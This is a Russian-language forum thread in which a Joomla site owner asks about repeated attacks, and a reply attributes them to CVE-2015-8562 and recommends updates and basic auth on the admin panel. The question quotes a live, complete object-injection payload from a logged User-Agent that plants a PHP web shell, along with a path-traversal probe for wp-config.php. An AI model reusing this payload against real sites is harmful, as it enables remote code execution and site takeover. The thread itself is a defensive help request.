Попытки взломать сайт
Страницы: 1
Попытки взломать сайт, CMS Joomla
Приветствую всех! Проблема такая: где-то пол года взломали сайт. Недавно решил восстановить сайт с нуля (на том же домене), однако после его восстановления атаки на сайт не прикратились. На сайте стоит компонент Rsfirewall, который ежедневно сообщает об опасности среднего уровня. Некоторые сообщения говорят о том, что на сайт пытались зайти используя неправильный логи/пароль. Другие указывает на то, что была попытка локального включения файла (более подробная информация - URI: download=../../../wp-config.php
Совпадение: ./ ). И ещё одни сообщения говорят об обнаружении опасного пользовательского агента:

Код
Пользовательский агент: 
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:253:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."images".chr(47)."404.php","|=|\x3C".chr(63)."php
 
\x24mujj=\x24_POST['@123'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~
               
 


 Я баню IP через которые происходят атаки (и вообще внёс в чёрный список почти все страны), но атаки не прекращаются с других адресов. Что это за атаки и как возможно максимально обезопасить себя от них?
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу. 
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера. 

Добавьте basic авторизацию на админку
Цитата
siteclean пишет:
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу.
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера.

Добавьте basic авторизацию на админку
Спасибо! Не подскажите как сделать такую авторизацию?
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:18 OpenAI и шейхи: Цензура на продажу и "гибкие" идеалы амеров 
13:54 Яндекс туда же: "Нейро" отжал 50% первого экрана. Органический трафик падает 
08:44 Телега на ручнике: РКН включил замедление и логи админок покраснели 
22:45 Биржа купли-продажи сайтов, каналов и сообществ 
22:08 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 
22:13 SEO под нейро 
15:57 Раскрутка форума 
18:37 TELEGRAM EXPERT — Многоцелевой комбайн по работе с Telegram 
17:04 Рассылки СМС/SMS, Вайбер/Viber, Ватсап/Whatsapp, Телеграм/Telegram любой тематики по всему миру 
16:19  
14:41 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
13:40 Сервис смс активаций и аренды мобильных номеров ALISMS 
12:51 E-currency.exchange — ваш помощник в мире обменов 
12:29 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
17:39 Добро пожаловать в цифровой мир... 
13:26 блокировка youtube 2026: ркн начинает «выдавливание». кто уже пробовал вк видео? 
00:10 Ставки на супер тренды в спорте 
23:44 Точные прогнозы на футбол 
16:39 Оцифровка старых физических фотографий 
13:55 Туалетные секреты: Замурчательная тема 
18:43 Индия влепила Intel 3 ляма баксов за дискриминацию по гарантии